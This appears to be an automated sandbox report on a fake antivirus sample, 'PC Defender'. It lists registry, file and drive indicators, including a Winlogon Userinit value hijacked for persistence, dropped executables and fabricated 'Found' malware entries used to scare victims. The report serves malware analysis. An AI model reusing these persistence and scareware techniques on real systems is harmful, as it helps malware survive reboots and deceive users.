memory/492-9-0x00000000753A0000-0x0000000075B50000-memory.dmp

memory/492-10-0x0000000005760000-0x0000000005770000-memory.dmp

memory/492-11-0x0000000005760000-0x0000000005770000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win7-20240221-en

Max time kernel

148s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\PCDefender.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,\"C:\\Program Files (x86)\\Def Group\\PC Defender\\Antispyware.exe\"" C:\Windows\syswow64\MsiExec.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Program Files\Internet Explorer\iexplore.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Def Group\PC Defender\proccheck.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Def Group\PC Defender\hook.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIC504.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f76c19a.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76c19d.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19a.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19f.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76c19d.ipi C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8a-70-d1-5d-21-ee C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerDaily = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore\Count = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\updateSchedulerDaily = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\updateSchedulerDayOfWeek = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found\C:\Windows\System32\more.com = "Backdoor.Win32.ProRat.gej" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found\C:\Windows\Fonts\arabtype.ttf = "Trojan.Win32.Llac.bia" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Suggested Sites\DataStreamEnabledState = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{B4F3A835-0E21-4959-BA22-42B3008E02FF}\iexplore\Count = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7DB14485-0BDA-4E05-ABC4-CA60423FADA5}\8a-70-d1-5d-21-ee C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7DB14485-0BDA-4E05-ABC4-CA60423FADA5}\WpadNetworkName = "Network 3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore\Time = e807030006000200160026002300a302 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerSecond = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{2916C86E-86A6-43FE-8112-43ABE6BF8DCC} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 010000000000000020cb685cf26cda01 C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Suggested Sites\MigrationTime = c0beb45ef26cda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\AppDataLow\Software\Microsoft C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerDayOfWeek = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Main\OperationalData = "4" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}\iexplore C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\scanSchedulerMinute = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group\Antispyware\Found\C:\Windows\ehome\mstvcapn.dll = "Trojan.Win32.Agent.dfki" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000004000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\Suggested Sites C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\MAO Settings\DiscardLoadTimes = 403cf55cf26cda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{7DB14485-0BDA-4E05-ABC4-CA60423FADA5}\8a-70-d1-5d-21-ee C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Settings\{72853161-30C5-4D22-B7F9-0BBC1D38A37E} C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}\iexplore\Time = e807030006000200160026002300e102 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Def Group C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{08244EE6-92F0-47F2-9FC9-929BAA2E7235} {0C6C4200-C589-11D0-999A-00C04FD655E1} 0xFFFF = 010000000000000020cb685cf26cda01 C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Clients = 3a0000000000 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media\1 = ";" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Language = "1033" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AdvertiseFlags = "388" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AdvertiseFlags = "388" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\InstanceType = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Version = "16777216" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Language = "1033" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\InstanceType = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AuthorizedLUAApp = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\ProductName = "PC Defender" C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Clients = 3a0000000000 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\ProductName = "PC Defender" C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media\1 = ";" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\InstanceType = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AuthorizedLUAApp = "0" C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Media C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Clients = 3a0000000000 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C73BCE36FA1AA0E45AB2649A3FA0D390 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\ProductName = "PC Defender" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\Assignment = "1" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\DeploymentFlags = "3" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList\PackageName = "PCDefenderSilentSetup.msi" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AuthorizedLUAApp = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\SourceList C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\PackageCode = "18627594958587344B2B3984171915B1" C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\ProductName = "PC Defender" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\RarSFX0\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_ C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\E8CBA2CF517323A48B5B5539084F2528_\AdvertiseFlags = "388" C:\Windows\SysWOW64\reg.exe N/A
